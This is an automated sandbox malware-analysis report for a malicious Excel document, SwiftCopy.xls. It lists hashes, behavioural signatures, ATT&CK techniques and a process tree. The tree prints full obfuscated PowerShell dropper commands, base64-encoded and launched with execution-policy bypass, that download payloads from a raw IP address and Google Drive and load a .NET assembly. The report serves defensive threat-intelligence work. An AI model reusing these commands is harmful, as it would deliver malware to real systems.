752387dc376a39db5dcdf2b0030bef0e516b1331b059fff96e4f87f48126a1c8

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29-10-2024 06:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SwiftCopy.xls
Size

98KB
MD5

524559bfe8623365f3e1569b5b58be85
SHA1

2638ebe72c1df88dd7d9ba66654c55160d41287c
SHA256

752387dc376a39db5dcdf2b0030bef0e516b1331b059fff96e4f87f48126a1c8
SHA512

c2b7f278e9827a53f325c94f736b04451f1021807be5b54c68534e6f2f1f24a51a7977bc762f8dd216d83821be8c85309d2b953117412181848cac877afcc454
SSDEEP

1536:BiqHy1S6F8b2SQrEkawpoXIoGks1Y5jWWTerlEdA5xwiglkk/UlvKBut:beFHrE2sIoGdYkF6y5xtIkk/Oi

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2740	mshta.exe
11	2740	mshta.exe
13	1824	poWERsHELl.eXe
15	2752	powershell.exe
17	2752	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1712	powershell.exe
2752	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1824	poWERsHELl.eXe
2584	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	poWERsHELl.eXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERsHELl.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2980	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1824	poWERsHELl.eXe
2584	powershell.exe
1824	poWERsHELl.eXe
1824	poWERsHELl.eXe
1712	powershell.exe
2752	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1824	poWERsHELl.eXe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2980	EXCEL.EXE
2980	EXCEL.EXE
2980	EXCEL.EXE
2980	EXCEL.EXE
2980	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 1824	2740	mshta.exe	32
PID 2740 wrote to memory of 1824	2740	mshta.exe	32
PID 2740 wrote to memory of 1824	2740	mshta.exe	32
PID 2740 wrote to memory of 1824	2740	mshta.exe	32
PID 1824 wrote to memory of 2584	1824	poWERsHELl.eXe	34
PID 1824 wrote to memory of 2584	1824	poWERsHELl.eXe	34
PID 1824 wrote to memory of 2584	1824	poWERsHELl.eXe	34
PID 1824 wrote to memory of 2584	1824	poWERsHELl.eXe	34
PID 1824 wrote to memory of 2940	1824	poWERsHELl.eXe	36
PID 1824 wrote to memory of 2940	1824	poWERsHELl.eXe	36
PID 1824 wrote to memory of 2940	1824	poWERsHELl.eXe	36
PID 1824 wrote to memory of 2940	1824	poWERsHELl.eXe	36
PID 2940 wrote to memory of 2944	2940	csc.exe	37
PID 2940 wrote to memory of 2944	2940	csc.exe	37
PID 2940 wrote to memory of 2944	2940	csc.exe	37
PID 2940 wrote to memory of 2944	2940	csc.exe	37
PID 1824 wrote to memory of 1988	1824	poWERsHELl.eXe	38
PID 1824 wrote to memory of 1988	1824	poWERsHELl.eXe	38
PID 1824 wrote to memory of 1988	1824	poWERsHELl.eXe	38
PID 1824 wrote to memory of 1988	1824	poWERsHELl.eXe	38
PID 1988 wrote to memory of 1712	1988	WScript.exe	39
PID 1988 wrote to memory of 1712	1988	WScript.exe	39
PID 1988 wrote to memory of 1712	1988	WScript.exe	39
PID 1988 wrote to memory of 1712	1988	WScript.exe	39
PID 1712 wrote to memory of 2752	1712	powershell.exe	41
PID 1712 wrote to memory of 2752	1712	powershell.exe	41
PID 1712 wrote to memory of 2752	1712	powershell.exe	41
PID 1712 wrote to memory of 2752	1712	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SwiftCopy.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2980

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\SysWOW64\WindowSpOwERshelL\v1.0\poWERsHELl.eXe
  "C:\Windows\SystEm32\WindowSpOwERshelL\v1.0\poWERsHELl.eXe" "POwersHell -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT ; iex($(iEx('[sYsTeM.teXt.ENCOdinG]'+[ChaR]0X3a+[chAr]58+'UTF8.gETsTrINg([sySteM.cONVErt]'+[ChAr]58+[chaR]58+'fRombaSe64STRiNg('+[cHAr]0x22+'JDBjWklXOXhNdFR4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFUkRFRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWklDaFJKY2l4a04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ4a0dZZERlZnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJd3NkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCb1JuKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVc1hUUWciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnFreiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwY1pJVzl4TXRUeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzMxMi91dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kb3dpdGhtZS50SUYiLCIkRU52OkFQUERBVEFcdXRoaW5raWFtdGhlZ29vZHRoaW5nc2ZvcnVnaXZlbm1lYmVzdHRoaW5nc3RvZC52YlMiLDAsMCk7U1RBUnQtc0xlZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVx1dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kLnZiUyI='+[ChAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vsq4vo_.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF4CA.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2944
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnN3ZZaW1hZ2VVcmwgPSB3MlBodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB3MlA7N3ZZd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlJysnYkNsaWVudDs3dllpbWFnZUJ5dGVzID0gN3ZZd2ViQ2xpZW50LkRvd25sb2FkRGF0YSg3dllpbWFnZVVybCk7N3ZZJysnaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoN3ZZaW1hZ2VCeXRlcyk7N3ZZc3RhcnQnKydGbGFnID0gdzJQPDxCQVNFNjRfU1RBUlQ+PncyUDsnKyc3dlllbmRGbGFnID0gdzJQPDxCQVNFJysnNjRfRU5EPj53MlA7N3ZZc3RhcnRJbmRleCA9IDd2WWltYWdlVGV4dC5JbmRleE9mKDd2WXN0YXJ0RmxhJysnZyk7N3ZZZW5kSW5kZXggPSA3dllpbWFnZVRleHQuSW5kZXhPZig3dlllbmRGbGFnKTs3dllzdGFydEluZGV4IC1nZSAwIC1hbmQgN3ZZZW5kSW5kZXggLWd0IDd2WXN0YXJ0SW5kZXg7N3ZZc3RhcnRJbicrJ2RleCArPSA3dllzdGFydEZsYWcuTGVuJysnZ3QnKydoOzd2WWJhc2U2NExlbmd0aCA9IDd2WWVuZEluZGV4IC0gN3ZZc3RhcnRJbmRleDs3dlliYXNlNjRDb21tYW5kID0gN3ZZaW1hZ2VUZXh0LlN1YnN0cmluZyg3dllzdGFydEluZGV4LCA3dlliYXNlNjRMZW5ndGgpOzd2WWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKDd2WWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqR3cgRm9yRWFjaC1PYmplY3QgeyA3dllfIH0pWy0xLi4tKDd2WWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07N3ZZY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5DbycrJ252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0JysncmluZyg3dlliYXNlNjRSZXZlcnNlZCk7N3ZZbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1iJysnbHldOjpMb2FkKDd2WWNvbW1hJysnbmRCeXRlcyk7N3ZZdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3MlBWQUl3MlApOzd2WXZhaU1ldGhvJysnZC5JbnZva2UoN3ZZbnVsbCwgQCh3MlB0eHQuU0dPTEtMLzIxMy81NTEuODcxLjY0Ljg5MS8vOnB0dGh3MlAsIHcyJysnUGRlc2F0aXZhZG93MlAsIHcyUGRlc2F0aXZhZG93MlAsIHcyUGRlJysnc2F0aXZhZG93MlAsJysnIHcyUGFzcG5ldF9yZWdiJysncm93c2Vyc3cyUCwgdzJQZGVzYXRpdmFkb3cyUCwgdzJQZGVzYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2F0aXZhZG93MlAsdzJQZGVzJysnYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2EnKyd0aXYnKydhZG93JysnMlAsdzJQMXcyUCx3MlBkZXNhdGl2YWRvdzJQKSk7JykgLUNyRVBsQWNlKFtjSGFSXTExOStbY0hhUl01MCtbY0hhUl04MCksW2NIYVJdMzkgLXJFcGxBY2UgICc3dlknLFtjSGFSXTM2LXJFcGxBY2Unakd3JyxbY0hhUl0xMjQpIHwgJiAoICRwc0hvTUVbMjFdKyRwc0hvTUVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1712
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('7vYimageUrl = w2Phttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur w2P;7vYwebClient = New-Object System.Net.We'+'bClient;7vYimageBytes = 7vYwebClient.DownloadData(7vYimageUrl);7vY'+'ima'+'geText = [System.Text.Encoding]::UTF8.GetString'+'(7vYimageBytes);7vYstart'+'Flag = w2P<<BASE64_START>>w2P;'+'7vYendFlag = w2P<<BASE'+'64_END>>w2P;7vYstartIndex = 7vYimageText.IndexOf(7vYstartFla'+'g);7vYendIndex = 7vYimageText.IndexOf(7vYendFlag);7vYstartIndex -ge 0 -and 7vYendIndex -gt 7vYstartIndex;7vYstartIn'+'dex += 7vYstartFlag.Len'+'gt'+'h;7vYbase64Length = 7vYendIndex - 7vYstartIndex;7vYbase64Command = 7vYimageText.Substring(7vYstartIndex, 7vYbase64Length);7vYbase64Reversed = -join (7vYbase64Command.ToCharArray() jGw ForEach-Object { 7vY_ })[-1..-(7vYbase64Command.Length)];7vYcommandBytes = [System.Co'+'nvert]::F'+'romBase64St'+'ring(7vYbase64Reversed);7vYloadedAssembly = [System.Reflection.Assemb'+'ly]::Load(7vYcomma'+'ndBytes);7vYvaiMethod = [dnlib.IO.Home].GetMethod(w2PVAIw2P);7vYvaiMetho'+'d.Invoke(7vYnull, @(w2Ptxt.SGOLKL/213/551.871.64.891//:ptthw2P, w2'+'Pdesativadow2P, w2Pdesativadow2P, w2Pde'+'sativadow2P,'+' w2Paspnet_regb'+'rowsersw2P, w2Pdesativadow2P, w2Pdesativadow2P,w2Pdesativadow2P,w2Pdesativadow2P,w2Pdes'+'ativadow2P,w2Pdesativadow2P,w2Pdesa'+'tiv'+'adow'+'2P,w2P1w2P,w2Pdesativadow2P));') -CrEPlAce([cHaR]119+[cHaR]50+[cHaR]80),[cHaR]39 -rEplAce '7vY',[cHaR]36-rEplAce'jGw',[cHaR]124) | & ( $psHoME[21]+$psHoME[30]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
ed4f71ae27e5b8873046898c964e8a2f

SHA1
dd402cf0de98854f675e7dc019b7f235cb1c2c25

SHA256
74036d311054de3076d2f9b7e8279f2401e98f846d6bb05d1ae34438f47ce61d

SHA512
164e7febfc3362cc99dd94b93033ae817d197baedd189ad535766691aa830926a4c97b2c0f922561a1f691ef9f8370f89cc4cbea1306e9dca65d9f5b591a4495

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
648e1e0b685b6dcc90a7e18383f6158f

SHA1
817fe8216c6329c5ea1490d29e533bd7fd056aa7

SHA256
6961d4c2684fd3498589c7518064417c31e25f22f7b8ff0177c04f0cd351dadf

SHA512
2b5bbb1257ee18c29971051286ecebc82b04c5eb863355ed57bbf5d3e19664ead4af72eb2320ec2bd215213bae905324137b5f9940cd2d4df4bc5b76ba297a61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
9afffa52ffbab34712fff22fd01608da

SHA1
52e22ee1d5683700c3fef0036792365e1ccc151e

SHA256
0e808879e7857b2dcbe357260055f3549e5e73732d88ef2c5c65da8eeaae68c6

SHA512
1abe7dad5684d317208f919edaed3a9c39ae8864c9962fd29164fdec62152c8e8c8a8a7f0f392264e3d9da7ce84eab7391b840a9c7f9720119550c37632dbc30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\goodthingstoapprovethebestwaytounderstandhowmuchgood[1].hta

Filesize
8KB

MD5
7d0ad307c44b16b828680260c249ae33

SHA1
a3ade36769e4b17d2d9b7c8f40f626cf8878c259

SHA256
66e4da6329b969cc416e9b0e19a91618cfe00d2de4e29f001baf785160d74c02

SHA512
0d856a523911116d1306361ce18735daa24830ce987ea8298581a909837d93b97a7ec6a459b5100b9e4d91899a4b89c47e43b8092051e86da2eec0a3b19de3d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\3vsq4vo_.dll

Filesize
3KB

MD5
9da86244901fcc9aa48eda51efc08315

SHA1
881d457403c8a402ac5178daeb85d91537628624

SHA256
4a9489560cdf706abeda41a709a3f2e974f3874a6639389409f3d06d06f049a8

SHA512
3f30026996cccf0f89cb80c2030ba1ddddefbaa8cf77711c8943686f47a75112d2c5df8d1704fe514976fd174a0871be0b25f070f27b7aa7065bdeb236383335

Download Submit
C:\Users\Admin\AppData\Local\Temp\3vsq4vo_.pdb

Filesize
7KB

MD5
07fec3c5467aff4b06a83dedfbf6e070

SHA1
bfe155465f93b55abc964db1bb4833fa0bcbef72

SHA256
7d89e604e7d6aa212515b98924e6df136015361cd27298bc120e339d2db0c022

SHA512
40076aa867d4408b885619f6a2fe503a851ce283413bf66cb55f887b57787f69067497c2c471c426a925f2ddf709bcc783fc5c7eaeb319264b860c3cd9ea2103

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEDF7.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF4CB.tmp

Filesize
1KB

MD5
dc89a1705f51305aa0462ed18c19ada2

SHA1
ebae50c7f19a5bdf35362cf1e2ec272812eaabb3

SHA256
e6c32ae47c7f4ff3ab62f29b32b0ec1dc85a01c567c5fb89ad866ff4a6306805

SHA512
c26177c5ba4fdfc7dbaf621fd043b5177bf19350186b2b641a29a98049b970ee9728188bdc7a0b8375777e1229b6dc2302591d00f7c04f0f5061bdd6ef62cb9f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b126d6b5b6027a3b983211b49bf6b146

SHA1
fa701acf77f2b369e96585f0e51e4abb76a231da

SHA256
2cde3f9c866cd7c23e39e6a6e6aced0acab0e6498a8aa01ede26c56b064144c3

SHA512
beec9f283b103d7a6625c932d7b848ba339c16302798b3a53a8a064e9b1f285539bb72622ecba81dd974bca571fcfe700ae52e4a50eab558ea42989f7f3cecf1

Download Submit
C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS

Filesize
136KB

MD5
f1580330671ef5f9f2c0525092a52a1e

SHA1
e22a52d31f506f4b23fffdf438b2a87c630520d3

SHA256
aa9e57ff6fa9792bc9f8bd02acbd5d248f2e6e361e0516a8972265a90002ed6b

SHA512
940477c296ff67079eaed9cf0a0e894450b919e6d8416e7bc0b8c0031c8c16d5ad1d9a4757d17627cc9f2ceb331f0f432e78d8621497fcf2085e37ea39ca6fa3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3vsq4vo_.0.cs

Filesize
461B

MD5
47833bec615200eabb6b94b9402215d9

SHA1
0d09d6af10eb9d2eaa1f0b3083d7417715634610

SHA256
ca55753945475d20ea711d447df602805205d08d77f7fb3495b85e90cb759e02

SHA512
f94e3794f1efd72a4dd88ffa98f4be25b165281f5184e31522995e683b6b17ae4c898127927e7ec257d3794405c560e7b1e5d9c941c88e6a79c95cef794ceeb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3vsq4vo_.cmdline

Filesize
309B

MD5
08e7922bacccba286d6facba3377b967

SHA1
02433627178283e0f1378d65b986917f1f22e786

SHA256
f9b4f78fee33de7c7bd4014de2523cccccd3d91b00ff9ddccce8b6231d90deae

SHA512
140e78df20d495dd55210472f33d80012b69477fda02f2f3f80e88a5ee5af235a9bdf65db1738bddc151071cd4f5ced3bf50254dc0495ffa2af03f482bc8b6e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF4CA.tmp

Filesize
652B

MD5
3a2c61c130f390b62cb9210963facad8

SHA1
4838f8156de56990ae52927d3827a8b9de30ded8

SHA256
d781d7d64bba9ec1d20378be302fa756b1f176154836b02b0224c43bdc7493d5

SHA512
8d5787534bdaf8cd1f74a4c92e3bd6d1b39707077be59fd06438acb97aec6fd565ee2973fd77710fba4553a03b397010ef019a2a6f78f5802a4a1bb2fb3db7a4

Download Submit
memory/2740-18-0x0000000002010000-0x0000000002012000-memory.dmp

Filesize
8KB

Download
memory/2980-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2980-1-0x000000007201D000-0x0000000072028000-memory.dmp

Filesize
44KB

Download
memory/2980-19-0x0000000002D40000-0x0000000002D42000-memory.dmp

Filesize
8KB

Download
memory/2980-76-0x000000007201D000-0x0000000072028000-memory.dmp

Filesize
44KB

Download